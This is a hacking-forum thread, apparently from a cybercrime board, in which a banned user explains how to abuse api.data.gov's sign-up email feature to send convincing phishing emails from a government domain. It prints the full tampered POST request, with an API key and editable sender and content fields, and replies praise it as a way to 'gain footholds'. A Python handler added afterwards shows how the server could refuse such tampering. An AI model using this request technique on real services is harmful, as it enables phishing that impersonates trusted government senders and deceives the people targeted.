
Sending legit phishing emails from *.data.gov

phish

HDD-drive
Banned
Registered: 29.10.2021
Messages: 29
Reactions: 10
Please note that this user is banned
In this thread I will discuss how I was able to customize emails from api.data.gov and send them to a user of my choice. Credit to pom for giving me the idea.
Below is the request that I stumbled across on open.gsa.gov/api/regulationsgov/


Code:
POST /api-umbrella/v1/users.json?api_key=E41mzkIX0ZReJvQbcSFtqhckpqFnTtkcsjFWAx1Z HTTP/1.1
Host: api.data.gov
Content-Length: 521
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: rnd
Origin: https://open.gsa.gov
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://open.gsa.gov/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

user[first_name]=test&user[last_name]=test&user[email]=test@yopmail.com&user[website]=doxbin.co.uk&user[use_description]=test&user[terms_and_conditions]=1&user[registration_source]=gsa-regulations&options[example_api_url]=&options[contact_url]=https://beta.regulations.gov/support&options[site_name]=Regulations.gov+API&options[send_welcome_email]=true&options[email_from_name]=eRulemaking+Help+Desk&options[email_from_address]=&options[verify_email]=true

By inspecting the page we can see all the default values.


Turns out all the values are able to be changed in the request on the client side, so that is what I did.

One issue that I came across was the limit on the first_name parameter, meaning the contents of the email were limited. I was able to bypass this limit restriction using another parameter.

This is a cool method of inboxing phishing emails; for example, if I was targeting someone on *.data.gov I could craft this fully legit email.
 
Please note that this user is banned
This is awesome.
Yeah, I'm surprised no one else has been using this to gain footholds. The only case I could find was the recent one pom did. That made use of something like this.
I came across multiple government & non-government web apps that allow a user to modify the email's contents on the client side so thought I would share this one as I don't have any use for it.
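
Editor's added example, not part of the thread and not api.data.gov's own code: a server-side handler for the sign-up form shown above that takes every email setting from a server-held table keyed by `registration_source`, reports client-sent `options[...]` values that disagree with it, and caps each user field that reaches the message. The table contents, limits and function name are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Hypothetical server-side settings per registration source (assumed values).
TRUSTED_SOURCES = {
    "gsa-regulations": {
        "site_name": "Regulations.gov API",
        "email_from_name": "eRulemaking Help Desk",
        "contact_url": "https://beta.regulations.gov/support",
        "send_welcome_email": "true",
        "verify_email": "true",
    },
}
# Assumed caps; every user field that is rendered into the email gets one.
FIELD_LIMITS = {"first_name": 80, "last_name": 80, "email": 254}
EMAIL_RE = re.compile(r"^[^@\s<>]+@[^@\s<>]+\.[^@\s<>]+$")


def build_welcome_email(raw_body):
    """Return (email dict, sorted list of client options that were ignored)."""
    form = dict(parse_qsl(raw_body, keep_blank_values=True))
    settings = TRUSTED_SOURCES.get(form.get("user[registration_source]", ""))
    if settings is None:
        raise ValueError("unknown registration source")
    # options[...] never reaches the template; mismatches are returned for logging.
    rejected = sorted(k for k, v in form.items()
                      if k.startswith("options[") and v != settings.get(k[8:-1], ""))
    user = {}
    for field, limit in FIELD_LIMITS.items():
        value = form.get(f"user[{field}]", "").strip()
        if not value or len(value) > limit or re.search(r"[\r\n\x00]", value):
            raise ValueError(f"invalid user[{field}]")
        user[field] = value
    if not EMAIL_RE.match(user["email"]):
        raise ValueError("invalid user[email]")
    # Only escaped, length-capped user fields and server settings enter the body.
    body = (f"Hello {html.escape(user['first_name'])} {html.escape(user['last_name'])},\n"
            f"your {settings['site_name']} key is ready. Support: {settings['contact_url']}")
    return {"to": user["email"], "from_name": settings["email_from_name"],
            "body": body}, rejected


# Constructed sample: the form shape from the post with altered options values.
SAMPLE = ("user[first_name]=test&user[last_name]=test&user[email]=test@example.com"
          "&user[registration_source]=gsa-regulations&options[site_name]=Constructed+Site"
          "&options[email_from_name]=Constructed+Sender&options[email_from_address]="
          "&options[contact_url]=https://constructed.example/"
          "&options[send_welcome_email]=true&options[verify_email]=true")
```

The returned list of ignored option keys is what a service would log or alert on, since a legitimate sign-up page never sends values that differ from the server's table.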
 

